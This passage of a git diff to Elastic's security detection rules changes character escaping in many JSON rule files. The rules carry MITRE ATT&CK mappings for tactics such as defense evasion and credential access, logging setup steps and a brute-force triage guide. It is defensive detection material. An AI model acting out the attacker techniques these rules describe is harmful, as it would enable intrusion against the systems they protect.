https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_5.json b/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_5.json index 5bae37c459d..41515fc6f18 100644 --- a/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_5.json +++ b/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_5.json @@ -49,7 +49,7 @@ ], "risk_score": 47, "rule_id": "4c59cff1-b78a-41b8-a9f1-4231984d1fb6", - "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -77,7 +77,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_6.json b/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_6.json index bcf9d45cd6b..e0f7abf9a95 100644 --- a/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_6.json +++ b/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_6.json @@ -49,7 +49,7 @@ ], "risk_score": 47, "rule_id": "4c59cff1-b78a-41b8-a9f1-4231984d1fb6", - "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -76,7 +76,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_7.json b/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_7.json index db863a7d94b..f1e47005566 100644 --- a/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_7.json +++ b/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_7.json @@ -49,7 +49,7 @@ ], "risk_score": 47, "rule_id": "4c59cff1-b78a-41b8-a9f1-4231984d1fb6", - "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -78,7 +78,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -105,7 +105,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_8.json b/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_8.json index b56f268cfd1..0174ebf1662 100644 --- a/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_8.json +++ b/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_8.json @@ -49,7 +49,7 @@ ], "risk_score": 47, "rule_id": "4c59cff1-b78a-41b8-a9f1-4231984d1fb6", - "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -78,7 +78,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -105,7 +105,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_1.json b/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_1.json index daff70b29e2..d6d52fb0764 100644 --- a/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_1.json +++ b/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_1.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -73,7 +73,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -95,7 +95,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_2.json b/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_2.json index 9bd2c78bcd7..2f10461cd8b 100644 --- a/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_2.json +++ b/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_2.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -73,7 +73,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -95,7 +95,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_3.json b/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_3.json index 7ee53fc6c8a..b5378844f96 100644 --- a/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_3.json +++ b/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_3.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -96,7 +96,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_4.json b/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_4.json index 144a1dde6ec..40703932bd3 100644 --- a/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_4.json +++ b/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_4.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -97,7 +97,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_5.json b/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_5.json index 89e4d6a78f3..417675b2d9e 100644 --- a/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_5.json +++ b/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_5.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -97,7 +97,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_102.json b/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_102.json index 2b5a26785b3..bb591d9a30a 100644 --- a/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_102.json +++ b/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_102.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_103.json b/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_103.json index 05ae2fa207d..e7f3a225be5 100644 --- a/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_103.json +++ b/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_103.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_104.json b/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_104.json index 885ca9159c5..1dd777be87d 100644 --- a/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_104.json +++ b/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_104.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_205.json b/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_205.json index d2cbccaac03..421b5879791 100644 --- a/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_205.json +++ b/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_205.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_102.json b/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_102.json index ed17c18db0c..981abe8bb28 100644 --- a/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_102.json +++ b/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_102.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_103.json b/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_103.json index b713f099192..c7687cdcaee 100644 --- a/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_103.json +++ b/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_103.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_104.json b/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_104.json index 76730407b94..24154bfa436 100644 --- a/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_104.json +++ b/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_104.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_105.json b/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_105.json index 022976d6b45..b0d0342066b 100644 --- a/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_105.json +++ b/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_105.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_105.json b/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_105.json index df9c309d52d..cc4b6714705 100644 --- a/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_105.json +++ b/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_105.json @@ -61,7 +61,7 @@ ], "risk_score": 21, "rule_id": "4de76544-f0e5-486a-8f84-eae0b6063cdc", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_106.json b/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_106.json index 71f8df6c13c..a95b52ba942 100644 --- a/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_106.json +++ b/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_106.json @@ -61,7 +61,7 @@ ], "risk_score": 21, "rule_id": "4de76544-f0e5-486a-8f84-eae0b6063cdc", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_107.json b/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_107.json index 9dc25d318f4..606888e6aa7 100644 --- a/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_107.json +++ b/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_107.json @@ -61,7 +61,7 @@ ], "risk_score": 21, "rule_id": "4de76544-f0e5-486a-8f84-eae0b6063cdc", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_108.json b/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_108.json index 6cc22c05744..3eb4a3fdfe7 100644 --- a/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_108.json +++ b/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_108.json @@ -61,7 +61,7 @@ ], "risk_score": 21, "rule_id": "4de76544-f0e5-486a-8f84-eae0b6063cdc", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_109.json b/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_109.json index 4f95726f329..a1b27c3bf5b 100644 --- a/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_109.json +++ b/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_109.json @@ -61,7 +61,7 @@ ], "risk_score": 21, "rule_id": "4de76544-f0e5-486a-8f84-eae0b6063cdc", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_4.json b/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_4.json index 2c1d692dc02..345840bdbbc 100644 --- a/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_4.json +++ b/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_4.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Multiple Logon Failure Followed by Logon Success", - "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure Followed by Logon Success\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address, followed by a successful logon, indicating that an attacker potentially successfully compromised the account.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure from the same Source Address - 48b6edfc-079d-4907-b43c-baffa243270d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure Followed by Logon Success\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address, followed by a successful logon, indicating that an attacker potentially successfully compromised the account.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to 